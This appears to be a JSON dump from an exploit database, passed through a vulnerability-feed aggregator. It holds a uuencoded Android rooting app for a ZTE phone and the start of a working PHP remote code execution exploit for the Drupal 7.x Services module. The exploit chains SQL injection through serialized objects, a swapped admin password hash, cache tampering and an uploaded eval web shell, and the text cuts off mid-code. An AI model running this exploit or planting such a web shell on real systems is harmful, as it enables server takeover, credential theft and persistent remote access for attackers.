\nM6']Q^&VG[N([CMV!6,2`(4*3P.-`K3**F3=GD7S/NMW^/TV`)HU\\+X?P>!$S \nM=\\UA:&8(.$W@HP`9B5A$Z)4C0$O+X_<++M5+>?1#`IYCX#T\">%M*U>;BCS<) \nMN&:P[^UCF/R;`S;U1-#'^(=!B\"8UT;TELJ_7(PO37@0PZ=+`R,[;BYZ`G_@( \nM(A]!&,+/60ZCO=3Z]]H<VF.JR`X$JJ,H\\C_]Z4__]H,//OCD(*Y_8%!H9F\"J \nM^9/O^LEO`_@V@,\\NKRT/_\\-__2O_^?^\\]!>_</KH*0T-#XX1W$2,&H;!4F.M \nM6,?HZHB-`]AR\\EAR2.#`$_MQ\\>`EK+7&4.E4$=43\");HF(YEV6X0T#*667/5 \nM3?HH1][<<?-\\RVR)'5VAB!H`=X\"[7[T3(8?0WL9FCL\\^YHKS2-\"U>+P$ZZ/@ \nM?>IV1KY90&UMV`[Q!I:*SL!F-[NE>5M5!_>2XP^81;`QAGS?5YU.QW_@@0>^ \nM]:E/?>K?[,7X@X!\"D9EE31_O`:\"1H9&5C_S4A_^D4V]2N]N%$))3OF!C-\"I! \nM!97R$!:JBU!)L@%D24Q0@<+PN2J*KY5P;ND<5*0AV*)D6TG+JG*GD[LI+WZ< \nM<O/2.HUZIFI'6H\"18-Q,X$3WF&U+>Q9HZGFV%B\"EQ/7BW+H8$V^1ZQL@%^4@ \nMC`\"S@6;M1K&W=LV#8`$&K0/LENMGC>_.?>_@P8-7OOC%+_[J)H:7MVP!;)X5 \nMZ`\\(WGWB'2_X0=!97%F0'@F&L1SP;!B2)&XI'D)S?Q--KP4=ZXWY,VS)]_`W \nM#R&ZW,.KC5=!CERQW>NX$6XGJA\"E5U?QBUWQ*.%^8$9*@N,8)3F$#]WQ(01> \nMN-'PGD3HY=`-NIC+SUJ6SC0-U)3A_&-`\"_B)9\\6E,V/9@P`T]F+\\W>H!V_0\" \nMV*%\\M5**\"H5\"\\]%''SUS_/CQ\\]N5>]_*!;!A:.3D]!WG[CQVYXNO7WF=!*0Q \nMQE`ZNZ:4PD1A'++B8_G@*I)V8CN!_?DV@O8,@@4/1QI'4.^NX=76JVCVFNA% \nM/=>,<;L\\SN3_J='3I9B0-;Z.D6^5\\-&%AS!9/`\"6C#`,X7F>Q1UZ$CDOQ+G\\ \nMFU\"^\"R[37#XC9`$P_,B'YQ;`H*YY\"XV>/>_\\02-^(C)**2BEQ)>^]*6/WW// \nM/<]C78!N3Q</-WX1`,S/GOK9QS[]F=]^5W=?FX40K!N:^!Q@H%\"0.1R]?!CG \nM+I[#4*Z\"H!=8;N`4Q,A6-[#*%4S_\\6%<\\\"Z@-;0&';MATCG7J9M3[HRG]6;0 \nMJPRZ*,`UVUXNRA(^?.K#F`H/(1(1?-B9><>,@:)7Q-69*WCM^;.VMI`*-:4* \nM'G4`9RU6,\"=#.];.9LMBSUZ-.BBR>)>@KT_NQ,PF#$/O=W[G=_[)1S[RD3_! \nMNHH0?IP+``#PX+T//(,J<%7,T)'Q(U`Z`1VR)`Z)U)@^<A17CUW'[*4%3+UR \nM$(E(^IS#Y(0C$B0HKY50NEY$Z_X6\\\"$?/)X`WP%P50`?DZ\"Z+0DS,Y!CX+\\J \nM\\#LU_%MR.'W^)-ZQ]@X,FR$T51.!9\\&F5I3\"@2XEX[F%%\\#C!G1\"6BJ9V,43 \nM30!O,#`%4\"207\\RMT][OL<!S(W#Q`0I!Z4PF$Y%)DL2[[;;;_MDG/O&)_X@? \nM4@W<VT7>I/U%<[GY7UZ_]OITJ]0V4_MND=0%N`:&SZ0%PPL]Y*MY7+E\\$;1( \nM**)HJ=`<X#)=!.Q9VKC5[ZYBW_413$T=16\\Y0D()<\"_;8E!1`P$@*4#EC1*. \nM^\\?Q[M5WXX[5$_!\\.\\Z=IFE$!\"$%#!A%*N!O]=-X>>$EZSTFL%XX@@LREP&, \nM`OE6`:5VP0ZI8,!!C3UB!??2\"\\@:GYF-4DH\"^-V%A85/P^9#\\<T8T+L9]__E \nMKWSY%S_^BQ]_W]#XL%Y=6)&79Z_@:##-O20B`!`>044*X^4Q3)>/X<+^-Y#S \nM\\RA>*D`7+%\"S[PU`J%0K.#1U\"'))8O*K8YC,CZ%>;D!]6<,$&E)(!\"9$.2JA \nMYM=07\"B`/$([Z,!+//B>;]7'TVS#(U3]\"IYOOX@GY;>M*$22!I(NJU`F(\\U& \nM*#8+MMG%@QE_$\"S`38`]L\\9G9_S'`'P-P%T.&+]L9YOW?O[?C`?@I:6ED5_Z \nMI5_ZXWJS7LDAAT1H6M)+.%0X2%[-9V.[!1:$1AJCIH:&:6%V^CH**T4$#1_& \nM,_T!C)3*M%PJHU`I(.+($E/W\\B@OES\"\\4L70RA\"JS0IR<6@EYJ7JCU-E7\\>P \nM@8%!211QMOT:'HT>A?8,,.-*N<.P!:\"4R;-+P!JC@\"**[;REMMWCSM]+Y#_` \nM<<(9<8?4^`+`BP#^RM5\"0P\"^YWG2/3BYD44@;W#W<Q`$_^IK7_O:ATJEDM9* \nM>SD=<MMKFZ@1T8%;)Z\"A*6VU&FG`+8-]Q5&T:AW,UJXCC//(-<+^&':V8YCM \nMP!EA8'P#+0VT9Z\"EMH4DUY/,EE=3XTLID?-R>\"EY&7]J_LRJAD':@I(&,.)X \nM`-,Z0@+0DD#-#-F&%N/F1\\)OO\"V<XOD(@-%:\"S?F]1(L\"*Z*=7EKSQ@CG`1, \nMEC3V1WH$,`#,S\\_O!\\!&&VC6'.H@*4?E[FISM:KK9EW^S$FUF@:#C,#IX5,X \nM:P1FQJ^BVQS%Z%+-RLG[#&UT'\\%KC$'*241,_22'/'N?,EW./H<>`7F11]2. \nM\\+<S3^$%^;S=1`E9/*&C9<%L\"BK!NCY/;#,2'V+/9_M>NWX[+)@^F).9V1@C \nMC#$1@&<!S,#RF&U6\"S99#D=F7LK6:GX4\"T``T/?<<\\]WO_\"%+SS,8(8&^:-A \nM8WEMI7;?R7>1;!`K;?HM=`@&M6$I6PWC=G,\"Q48!%^1%-`[7,=X:1Z5>@I#2 \nM\"CR3AI`2R\"R\"+/9]L]$!P&<?8.#-Z$T\\\\^(S:(2-C-J'$X-:<KE^XF1:TFIB \nM`G#,J.?K&,'(^D30+E'\\S?0`MKE/SJ!P+G\\55N5[>9/Q<^X8<%T+1`!B*66D \nME.K!+O4?V0+0`'#X\\.%7A1\"(H]@;K@TW&OFFF#AX0$Y,37\"OUB.25OB!/(!# \nM`9XS5O!YVO8#INXZ@FI4P_G&>5Q[[\"KR1PJH=4907BG\"5QZ$(XDVV+@(4JHT \nM21+\"C79%?H39<!87BY=PO3MC.0H?\\,\"Q6><!$@2\\HNW/A\\D11`!(W&C9#$.5 \nM%;JM+O+(KV<J-W#^[]'X_4`/EL4S=?GG856*E3OO,^K`D%C7*2_`]D(+S)S> \nM;PYZ%.QU`1\"`PLF3)X-?__5?-]*331B45%ZUHB@:/WG+*=:)!L6\"(36Q9*L6 \nM9FR#A35`7?OADRA&219P>N@T5B87<?7`-<P49^`O!R@OE5\"HYY'KA\"CH`DC; \nML?&T-\\`!HZX;B,HQFN4&Y@M+Z.7;%D[>%I8SOYY!^,8.SA6YZF++'0%)IISL \nM8H$6M1$@L(SD;-[*08T?JNIE=CT[#E]AC&F[\\_X:UF4L-[M]SOPME;;TC#$R \nM<_\\M70#%J:FI`U>O7IT:&AJZ;6YN[C\"`*@R8/9,LKR[73M_S-E')ETVTVA/D \nM1!T`JR!&VFD@&08K\"_^\")&AC<^V1H5'41D?PACJ/A>(L5H8CK`@\"O4[PEB3$ \nMVWR(EBOJ^%;].WJF!TP88!)`AX!$@&(\"1V9=I\"D]XY/TX,I2M*=7LTX;JP\"3 \nM:+1-!T4J;)O>[83-&[2DBW4\";F.,$4HI`G`5P/<=_CC(&#O;VV=LU`SO7X40 \nMK+4V>\\D&!ET`G\"0)34Y.^DJI`C,/D:\"BE++50Z]0&ZD%1R>/<A(E1$QLM.T) \nMP&DM&5A/(\"\"@(PUF1\\[H>&227@(9^Y!:VH_N\"2`/L#)(H(%*8F<`**5T<<B@ \nM6%C\"AYZ-Z)G2/H%K'\"4B@Q-$QB.XAE):`U#KO/]00#?N(`P#2\"$'+NP,&/GW \nM&==MC&>$UIJ8N0'@!V[7BVV,OQG<F;BS/^KW2HEB=U^_50L@=3N=Z]>OGP-P \nM96QL;(:(9L&8]@+_!-J]`T</3NO0#T2GUR%B8DNN877AC-$0OB\"2DNN-)G*4 \nMAQ`2B4GZ\\#H0@<GT%:_Z'STE<DP-F:*\";4_LAZ1S^O]NR@&4NG\"SZ6\\JDP)J \nMMYA2$F=EO\\Z.[J!<*M\\4B&.+&7VX1@YIK04S]V\"Y22XXP_F;#+_5(DC_TW;F \nMVG+7IKO/;]4\"R+Z0&!X>GI12'C'&'&+P9+%0N-+M=J;.OGBV5BT.F4JU2G$< \nM$34<XYD`!5[`[;FV>>/5-\\3<PBQJ%T8P?7\":\"Z4\"$IV0AF&L,>@2B.>,%5OT \nM';_OBAO0,&9]`:1?PZR;YKF4[G#WW?38OL;9C(%3&;<ZUN574V]@,D>%6?<2 \nM82[\\H2G@[8R_G5)W]O%$Q%IKH90B9DX`7'3&;SG#!]B$0<X8G#=Y@:;+#)9A \nM]497A!#+2JD5V&_EI@I!*>BC\\-!##U5/G3HU$@3!6+/9O+U<+M]MC#E)1$?` \nM&!5\")/E<?J[>:-9FKL\\4Q\\;VFWQ80`)%7N`!Q.;R[&5ZZ8T7Q=K\":B0Z8K45 \nMM^1\\/.=K4I3/YSDLA$\"'\"07BA>XB>JI+5JK=N7$#.QA*#@WL6;P_&FP1Q<6, \nMFG:*Y.T`J%+_=]06\\.<]F^[E>)U/(/V:]3KLA8RM1F8!GX/@\\K-S>9L?8XRA \nM)$E(:ZV<FW\\.P\"5G3'_39J,=H-S*&7_>7><`S'F>-Z>U7G3(1MYK5+_A4BZ7 \nMAYGY*#/?!N!V`..Y7$[F<CE?:^T1D61FD0I*\"R$T,_N+*XOW^P5_]-WO?+>I \nMC%<QMS+'KUYZ5:[55TW`P?FPDUOEGA%:ZF(T'.\\WHWK(&PZ\\?:/[,+HRPI7I \nM,L[67\\/JVC+!%XP`A&ML/^YI82%B0JS'`\"]JQ@$BU(C[43P(:!K@,H!C`-I$ \nMWH*$M^R,#X;.:ZBR$P..,R>IVS>%L(`P#+>C6]FJ:K=58)A&]-!:@YE;SN#7 \nM78Z>7:Y9P_,.J7?/&3BEP)@70LP1T;S6^H;[`5NMM'#?OGTG\\_G\\G<:8TP\"F \nMF5D:8U()9<Y.JAIC2)#0#)8+BPOORA5R8Z,'1W%E[@JDD-^N^M5O>HE74T:= \nMU$:7C3:^B8VO/56*JVK8C.H*%A%4;JNB&_20]\"*&%`2?&0L@M!@X3NN@SY2R \nM^AQ;%'$%C,1]#D%`BYFN$&0HX2U+(`&,,)3J':3I21(J&*'7T\\08\\*0%C@\"6 \nM>3,EPMRJ.;-IEW-*QJ\"=7*VKX\"VYR'[>&5!DCEW>Q>@I5\"5RQEU)=SX1S1+1 \nM@C%FR2V*>*\\[?Z<C0`=!H.,XSKDS*U!*Y;76J=:,E%)*ATPA(F+#1@@A=#Z7 \nMO]!H-,;65M=:U7SU4]WE[C\\>*@V]#($6$:T)(4@(X9,GI&\"1>!W9\\M:\\)F)* \nMNMT.&V+/U8$!$+F/QJ@(LA+NM\"[SL@Q&\"()/A`B,-AG,&\\(,2#8%R::PKE2B \nMWVBR::E;*PE9#*'#%`H2$)[<H+&WN?J8GN7N/FFM26M-29)0DB2DE.H98^K, \nM_(;+Y2_`1AZ4J=_O9J@4!=EQE<!9%R]<$$*<!W\"!F:\\R\\X([#A1NXD([%7Q. \nMG3J5HO!KS)P'D*_7Z^5>KS<1!,&8,:9&1#4`TGF%1!L-`EV60OZ-87-Y;F[N \nMH@MT<F-C8U/&F-/,?(<QYIAA,\\&:2T8;7VOMDZ2A_'#^8+/<TE&U)[`$0@_` \nME%CW`':VCW&)@1$B>*3DF[2*'BDH]MF.H@1(YWV<,;-7]PE9D\"6-`*US[6YR \nM^VE]O1\\09F^UUG/5.&X```03241!5+';G?/.M2^YG:Z1F5C<!JR9W?WI/%*Z \nMV^LNP%OT/&]!*;7H%L.:^WM\\H^W?01?`;I?\\V-C842'$:5B:QBD`83JBG((7 \nMB&B5F>=<(^.:.P/;[D@99>9;W'7\"L!G32@_EO-Q/)`4UO#:R\"M1!B`!,$-E) \nM79<%\"`)F#&,80\"RZ_F6YPCX+.ZG(:6M8,'/`S)*9/6;V,M6SOG$=D_8&PV>B \nM?V;FU#A)QCB1NUUS/R>9K(JV2.&RW[?)G.M)QN@-`\"N>YRTR\\Z+6>LD9O>'^ \nM'MWL;G^K>@'>R,A(60A1A)W3\"=(&1LI-`$\"X8'&<B`X`N!N`8N8N$;4!-*24 \nM#6;N`$B8>19`TTA39&:2L7@_KI)&Q!X,&!&OJW,[NZ`+1@0A#!2\\S#PO]1%! \nM['9CMN2:=MH28TS\"S)'6NILIM5+F9^%<;\"^SX_K#Y)D=GKKW[<YSDTDP$_=Z \nM'2)J\"B$:`%:8>=D8LP)@12E5=QZS]U;N]+<4$=1JM4K[]^^?8.8)9A[36I>( \nM2#O,6M_=$9')-#N(B/+,7\"2B\\70'NL5C`&@A!#-STV@S[Q?\\T43&C`2,*@\"G \nMY-[?4QJ$'(SL>JN\"*&9BS[52TZ20-B&?T^#5`%!\"B)8Q9HV9FYD^^N;=*S+/ \nM3U6%_,WHZ$PRJ3,[.Y92]HBHR\\P=(FH:8YK&F#J`)C.O::WKF>)-USU/WVA` \nM]^-:`\"J*HBM7KUY%/I]74LINI5(Y`:`FA`@V[03J^U$G5I\"Z6H<,9@!P53$+ \nM>A042Y87/>7M2W3,,*#^U[JQ*$I\"BT[>SUV7GI0@^.YHD:Z5*EQL(IA9R/0- \nM[?ODF3D'H,K,;6/,JEL,G4WOQ)EH/#5R&J0IYT5B(DI<5:_G#-D&T-%:IQ6Z \nMM@OJ4D-G2[8&_P\\O=)//SSWTT$-#CS_^^*3O^]/=;O<0@#$`9??A6LR\\Z/O^ \nMO._[3?=A0P\"U*(J&C3%5`*5RN5P*@B\"OE/(9[`D(='3G)^J=^B0,&`4\"#!-$ \nM6@ED@Q8H#,,K(Z61OV@T&HCCN./R[:;O^PVM==>U5?-$-)(DR7X'!BNYA9_V \nMS1?=M9'Q!)N-;S;M;I4Q8I*IQV=K\\TGFL3_67?WC7`\";+\\'##S]<=D9F(43T \nM^[__^ZUMD*L\"0/CPPP_GGWSRR>KERY</5:O5VWS?/Z:U'E5&W;%47WHGM'LU \nMVE0VB8\"AZM\"_]X3WG^Z]]]YH?'R\\]0=_\\`>='7+B\\&,?^UC!\\[PB,_NV5J.C \nMKWSE*]W,KA=;O-/FA6`VW?__^D)OX6OP'MYKN\\=6PC`\\,C(R<ILVYL3:VLK# \nM<91,DD]=\"^D%K.@@8A@$^3#_\"^UV^_&;>+^_\\Q?Z$;\\FW^#C@XF)B;(Q/`'P \nM\"(%TYK$Q@`8)BF9G9^<RS0^^P<_[=WIQ_%^HAH]3K4LF[0````!)14Y$KD)@ \nM@E!+`P04``@`\"`\"6@6@^S6*&<B,!``\"T`@``$P```')E<R]L87EO=70O;6%I \nM;BYX;6RE43%.PT`0G+4=VR$.2D%!`1^(1-S00`F4D?($L.(3MB\"V95\\$5$&\\ \nMB2?P@#P&6F\",SLK)HD&,-=J[6=_L[IV+$*\\.(#C\"%L`>#`2XP@[[Y#%Y0IZ2 \nM9^0E69$-^4*.1F6=JT(G.B\\+1-%]\\E2N]?5#GNH,X['99BJ_S30\\3ZM'#<?) \nM4P1!4J1UR=5TFFE=G<=QL\\S4*FEF)C%;EJLXJ>[B6C5Q]S,11?.\\4$D]__&& \nM[U^LM69Q/$O(B8`WB+R3'^1\"1+:,D`D.F>/8^\"(&C'Z[IWYCZ2U\"K@_XN>8> \nM?!--;B)&$TMKHV_Y=%KKKZD%EO_0^'N6O[<[1]O!IN__^8M_I[G660?>QC6S \nM]FMVO81_Z$7^T8MK]=*OV>G#WKU+3^_>Z1M02P<(S6*&<B,!``\"T`@``4$L# \nM!`H``````):!:#Y[W4G:\"`4```@%```.````<F5S;W5R8V5S+F%R<V,\"``P` \nM\"`4```$````!`!P`T`````<```````````$``#@``````````````!8````S \nM````4````&@```!R````A````!,3<F5S+VQA>6]U=\"]M86EN+GAM;``:&G)E \nM<R]D<F%W86)L92UM9'!I+VEC;VXN<&YG`!H:<F5S+V1R87=A8FQE+6AD<&DO \nM:6-O;BYP;F<`%15(96QL;R!7;W)L9\"P@>G1E<F]O=\"$`!P=Z=&5R;V]T``\\/ \nM<F]O=\"!Y;W5R('!H;VYE`!`0=6YR;V]T('1H92!P:&]N90````(<`2P$``!_ \nM````>@!T`&4`+@!R`&\\`;P!T```````````````````````````````````` \nM```````````````````````````````````````````````````````````` \nM```````````````````````````````````````````````````````````` \nM```````````````````````````````````````````````````````````` \nM```````````````````````````````````````````````````````````` \nM`````````````````````````````````````````````!P!```%````>`$` \nM``<````!`!P`7`````4```````````$``#````````````````<````2```` \nM&P```\"0````$!&%T='(`\"`AD<F%W86)L90`&!FQA>6]U=``&!G-T<FEN9P`\" \nM`FED``````$`'`!X````!P```````````0``.```````````````!P````X` \nM```6````(0```\"<````S````!`1I8V]N``0$;6%I;@`%!6AE;&QO``@(87!P \nM7VYA;64``P-B=&X`\"0EU;G)O;W1B=&X`!P=R;V]T8G1N``````(\"$``0```` \nM`0`````````\"`A``%`````(````!``````$```$\".`!,`````@````$````\\ \nM````)`````````````````\"@````````````!`````````````````````@` \nM````````\"````P$````!`C@`3`````(````!````/````\"0````````````` \nM````\\`````````````0````````````````````(``````````@```,\"```` \nM`@(0`!0````#`````0`````````!`C@`3`````,````!````/````\"0````` \nM```````````````````````````````````````````````(`````0````@` \nM``,``````@(0`\"`````$````!``````````````````````````!`C@`B``` \nM``0````$````2````\"0````````````````````````````````````````` \nM```````````0````(````#`````(`````@````@```,#````\"`````,````( \nM```#!`````@````$````\"````P4````(````!0````@```,&`````@(0`!@` \nM```%`````@```````````````0(X`&`````%`````@```$`````D```````` \nM````````````````````````````````````````````$`````@````&```` \nM\"```$@`````(````!0````@``!(`````4$L#!!0`\"``(`):!:#Y<Y;$'*`$` \nM`/@!```4````345402U)3D8O34%.249%4U0N34:ESTMKPD`4!>!](/\\ARQ;) \nM4ZI5<*%14J,1-5;CJDQG1ITXCSB3&)-?7PN%5FE7W5ZXWSDG`ISLL,K--9:* \nM\"-XU7,O1-5]BD&-D#JK/0\\MRWKR.\\1`7W(@(E$)5*L=,&6,.K4==T[498+AK \nM2*QL\"BI1Y#8#A%L71G4M?NF[YI#LKR%=`[_.XE$C+;?39EFAHCD];4G87\\LQ \nM'?6^G3Y'4A`4?77[Q:G#YP)[(**H,Z6M($_.Z6A(GXX)C7JW?9`$)7BGV&0H \nM(S:!@EL9W]]Q*Z]:;HB_6$HZ+!K+=K)WXW/0J?V%NN5$(2%6%I`*WA'C@[(G \nM-F(.+@^3,/+KUBFI[<K#&_&#@!0H=040OMS]HT'F1FP].`9DUTB#MC//%JM4 \nMA#!W_EIT^,>B#U!+!PA<Y;$'*`$``/@!``!02P,$%``(``@`EH%H/N46<_-/ \nM`0``6`(``!````!-151!+4E.1B]#15)4+E-&C9'+;H)`%(;W)KX#RS:$FU:Q \nM)EUPQUJ\\@*`NQV'`41AP!JKTZ6MZ28P)37<G)_F__-\\Y`4X)J&J*A`A1A@LR \nMYA11[G8,BD\"%8D%OOA;<@T9B6N\"8\"ZX!K3P^=CN!JRF\"B5/$*L$#!\"?78<Q- \nMH8J.O9EC'KPTR_@GW]K.@%LUJK%\\Z7:ZG1G(T9BCB$D9:(JZDG*`B7C)LS:@ \nM=1XEBZ4T!?M<QT-;7]A4D=]DF4>C&^!/O=_87\\!W<_Z1^HJW+9UESQV>)N'4 \nM\\*UFJ_?3NX8Q!6>PRY\"0QR66,\"R(6)*TC4L<S0CK.83)91WQ@6\\.%'FEFBFP \nM[[A%32%B(J`,ME[1*:.5JV-;/J\\W3'U^#8H#[TQ\"*Y%O6#`#C%U),;JTRNHQ \nM9(O]P295[GJA>CHJJM9O:E:P-MG]?V0]9@:;2(+V<+`J>HGL&':TF\\6.8WV_ \nM^1-02P<(Y19S\\T\\!``!8`@``4$L#!!0`\"``(`):!:#YE7CCZD@0``+H&```1 \nM````345402U)3D8O0T525\"Y24T$S:&+;QL:IU>;1]IV7D9UI01/;<H,FML5, \nMC(R&W`:<;*S:?,Q,4JP,!MP(18P+FE@V&32QK#-H8IZV@)F)D8F)DV'UMZ\"_ \nMS_NM#QOPPA4RL@+U-4X#F\\,<RL(FS.3L9RAHP`_B<`AS!&<DYJ5G)&;\"A-B1 \nMA'@,N$!\"7,+,42&NADH&\"B`>M[!D<&YB44E!1GY>JD)P?EI)>6)1JH)+:D&) \nM'DP',T2'HH$\\W!F<C&)\"Q:4%!?E%)0Y5):EZR?FY>LEY!G+BO(:&!L8&%@;F \nMAD8F)E'BO,9`II$)E#MX'=[$J(`<R(RL#,Q-C+P,0'$.IB9&1H;]L]:N3PI7 \nMB]N3<T2H:NM$EOS_M5]/SXO^=\">W[=ID_8)+BOT'V7E^IQW2#>R\\+)JG.;'( \nMV-VTP'RZQZ&'1^9<9WC1*G?8\\@M#]_MU7\\^W?C7[I,%>&L.W>MK4Z_FG?ZS6 \nM2;W!6;JXMG5N>LL\"NZ+]9<(>1Z=]<%KQX++RV?!STQGDW(5$)N_UT3+9GW3Q \nMPH6):3=37W\"8=#\\-7%0CDS?)I4S7ZM]NF^I=?B\\WSXBQ=<K)]/ENW,L24Z;B \nME?OD6]OQ'_Z*W'-5EVT^,:&:L\\;TH,7J,TO.?;C^:+Y@Z(,CJFG;GVS=;?YO \nM8>T9RWO:^G-Y?:W%OQNEY\\@H,NBTO#UGG-.^,^;OJ3OIKB?L_;R9&)D7-_XS \nM:/QM(`L,6%D^%C$6D=6+%JI7V`B],JKT2ZT]?<-$MR\"#SZ#Q-$A>F:7QL$'C \nM@0:L:A8VSEG2.'/0IH4FI'S'`_*,,`NK`3,CXW^T7,@,2A=UIDSQ'.^EN?@W \nM*-_Z'=O>M23AE_[[I*RYS[YNG6_8?):]^813DMB76N;'.]>W6S04!<Y8$;TU \nM\\M661^4>O4T*!?/?5<5JR$QGW#%O,S_/G+QE-ZOVS.LN^W8N+]C#LJ&MO]NF \nM7O>__'73DF8>[4TSFI1LDS+L5_@'<ORK+S$]O>FS;A^OQD_G]()>)HTBHQGZ \nMR2<;V^5KSV_RDU^WM>V/:NR3M0;Z1[;:UF8[G_`-OBRNH+)@QX9I_KSO3O%9 \nMZ9^>.+.SAV<_+_/IG#7/3FJ(/_QS-CC!?^:]$Y\\.&ECTFIR?=IE!(UWMV)U] \nM*ZPM[@J5S3KI^_-7MF;7VV_B?\\[T__S*;-P@^M.KZ\\&:#L,FQC/`3'(\"6+09 \nM-\"X9M'&*7)8BE;^H.9ZEB9$A>X-?[:3G?N719Z)E6OQ7'_WW[L3\\EU_*-C?V \nM=DLE,<;/_;MXW=_.N_M<9YU5CWJTK^C%JHG+9^P64'N;O:?HXQ))_E(SHWD+ \nMM=]PZ$X4^ZHXZ<O%]R(3A6KNQ9\\RWBDV^\\3B&(XUKX_^Z%-XNVVK_((#-<U\\ \nM?FII=]YM7^ZXH&U-??[#>TWK0^:<^/K>Z%;:*O.*G-ENLR*V=1_C*IIX^AMK \nMD41XJD[T`5,]*:VR8%$O];!'$]QY;Z=LN&CK46@OJ^:OO^30G/O>>6Z&IRYE \nM;YF6WS?%F\\U-8..-.*-WGF47KCS?=J=;P'`A']/^[TP<)]DJWA_2LC9EU'AX \nMZ]J2D[D3)EIX+<Q>?>^WPJ3':P%02P<(95XX^I($``\"Z!@``4$L!`A0`%``( \nM``@`EH%H/FQ8_4G/`P``<`P``!,`!```````````````_!$``$%N9')O:61- \nM86YI9F5S=\"YX;6S^R@``4$L!`A0`%``(``@`EH%H/A-<@!)>\"@``N!,```L` \nM````````````````$!8``&-L87-S97,N9&5X4$L!`@H`\"@``````EH%H/O,2 \nMI^5P9```<&0``!H`````````````````IR```')E<R]D<F%W86)L92UH9'!I \nM+VEC;VXN<&YG4$L!`@H`\"@``````EH%H/O,2I^5P9```<&0``!H````````` \nM````````4(4``')E<R]D<F%W86)L92UM9'!I+VEC;VXN<&YG4$L!`A0`%``( \nM``@`EH%H/LUBAG(C`0``M`(``!,`````````````````^.D``')E<R]L87EO \nM=70O;6%I;BYX;6Q02P$\"\"@`*``````\"6@6@^>]U)V@@%```(!0``#@`````` \nM``````````!<ZP``<F5S;W5R8V5S+F%R<V-02P$\"%``4``@`\"`\"6@6@^7.6Q \nM!R@!``#X`0``%`````````````````\"0\\```345402U)3D8O34%.249%4U0N \nM34902P$\"%``4``@`\"`\"6@6@^Y19S\\T\\!``!8`@``$`````````````````#Z \nM\\0``345402U)3D8O0T525\"Y31E!+`0(4`!0`\"``(`):!:#YE7CCZD@0``+H& \nM```1`````````````````(?S``!-151!+4E.1B]#15)4+E)305!+!08````` \n.\"0`)`$H\"``!8^``````` \n` \nend \n------------------------------------------------------------- \n`\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/160231/ztebladevantagez839-escalate.txt"}], "zdt": [{"lastseen": "2018-01-10T03:12:57", "description": "Exploit for php platform in category web applications", "edition": 1, "published": "2017-03-09T00:00:00", "type": "zdt", "title": "Drupal 7.x Module Services - Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvelist": [], "modified": "2017-03-09T00:00:00", "href": "https://0day.today/exploit/description/27274", "id": "1337DAY-ID-27274", "sourceData": "# Exploit Title: Drupal 7.x Services Module Remote Code Execution\r\n# Vendor Homepage: https://www.drupal.org/project/services\r\n# Exploit Author: Charles FOL\r\n# Contact: https://twitter.com/ambionics \r\n# Website: https://www.ambionics.io/blog/drupal-services-module-rce\r\n \r\n \r\n#!/usr/bin/php\r\n<?php\r\n# Drupal Services Module Remote Code Execution Exploit\r\n# https://www.ambionics.io/blog/drupal-services-module-rce\r\n# cf\r\n#\r\n# Three stages:\r\n# 1. Use the SQL Injection to get the contents of the cache for current\r\nendpoint\r\n# along with admin credentials and hash\r\n# 2. Alter the cache to allow us to write a file and do so\r\n# 3. Restore the cache\r\n# \r\n \r\n# Initialization\r\n \r\nerror_reporting(E_ALL);\r\n \r\ndefine('QID', 'anything');\r\ndefine('TYPE_PHP', 'application/vnd.php.serialized');\r\ndefine('TYPE_JSON', 'application/json');\r\ndefine('CONTROLLER', 'user');\r\ndefine('ACTION', 'login');\r\n \r\n$url = 'http://vmweb.lan/drupal-7.54';\r\n$endpoint_path = '/rest_endpoint';\r\n$endpoint = 'rest_endpoint';\r\n \r\n$file = [\r\n 'filename' => 'dixuSOspsOUU.php',\r\n 'data' => '<?php eval(file_get_contents(\\'php://input\\')); ?>'\r\n];\r\n \r\n$browser = new Browser($url . $endpoint_path);\r\n \r\n \r\n# Stage 1: SQL Injection\r\n \r\nclass DatabaseCondition\r\n{\r\n protected $conditions = [\r\n \"#conjunction\" => \"AND\"\r\n ];\r\n protected $arguments = [];\r\n protected $changed = false;\r\n protected $queryPlaceholderIdentifier = null;\r\n public $stringVersion = null;\r\n \r\n public function __construct($stringVersion=null)\r\n {\r\n $this->stringVersion = $stringVersion;\r\n \r\n if(!isset($stringVersion))\r\n {\r\n $this->changed = true;\r\n $this->stringVersion = null;\r\n }\r\n }\r\n}\r\n \r\nclass SelectQueryExtender {\r\n # Contains a DatabaseCondition object instead of a SelectQueryInterface\r\n # so that $query->compile() exists and (string) $query is controlled by\r\nus.\r\n protected $query = null;\r\n \r\n protected $uniqueIdentifier = QID;\r\n protected $connection;\r\n protected $placeholder = 0;\r\n \r\n public function __construct($sql)\r\n {\r\n $this->query = new DatabaseCondition($sql);\r\n }\r\n}\r\n \r\n$cache_id = \"services:$endpoint:resources\";\r\n$sql_cache = \"SELECT data FROM {cache} WHERE cid='$cache_id'\";\r\n$password_hash = '$S$D2NH.6IZNb1vbZEV1F0S9fqIz3A0Y1xueKznB8vWrMsnV/nrTpnd';\r\n \r\n# Take first user but with a custom password\r\n# Store the original password hash in signature_format, and endpoint cache\r\n# in signature\r\n$query = \r\n \"0x3a) UNION SELECT ux.uid AS uid, \" .\r\n \"ux.name AS name, '$password_hash' AS pass, \" .\r\n \"ux.mail AS mail, ux.theme AS theme, ($sql_cache) AS signature, \" .\r\n \"ux.pass AS signature_format, ux.created AS created, \" .\r\n \"ux.access AS access, ux.login AS login, ux.status AS status, \" .\r\n \"ux.timezone AS timezone, ux.language AS language, ux.picture \" .\r\n \"AS picture, ux.init AS init, ux.data AS data FROM {users} ux \" .\r\n \"WHERE ux.uid<>(0\"\r\n;\r\n \r\n$query = new SelectQueryExtender($query);\r\n$data = ['username' => $query, 'password' => 'ouvreboite'];\r\n$data = serialize($data);\r\n \r\n$json = $browser->post(TYPE_PHP, $data);\r\n \r\n# If this worked, the rest will as well\r\nif(!isset($json->user))\r\n{\r\n print_r($json);\r\n e(\"Failed to login with fake password\");\r\n}\r\n \r\n# Store session and user data\r\n \r\n$session = [\r\n 'session_name' => $json->session_name,\r\n 'session_id' => $json->sessid,\r\n 'token' => $json->token\r\n];\r\nstore('session', $session);\r\n \r\n$user = $json->user;\r\n \r\n# Unserialize the cached value\r\n# Note: Drupal websites admins, this is your opportunity to fight back :)\r\n$cache = unserialize($user->signature);\r\n \r\n# Reassign fields\r\n$user->pass = $user->signature_format;\r\nunset($user->signature);\r\nunset($user->signature_format);\r\n \r\nstore('user', $user);\r\n \r\nif($cache === 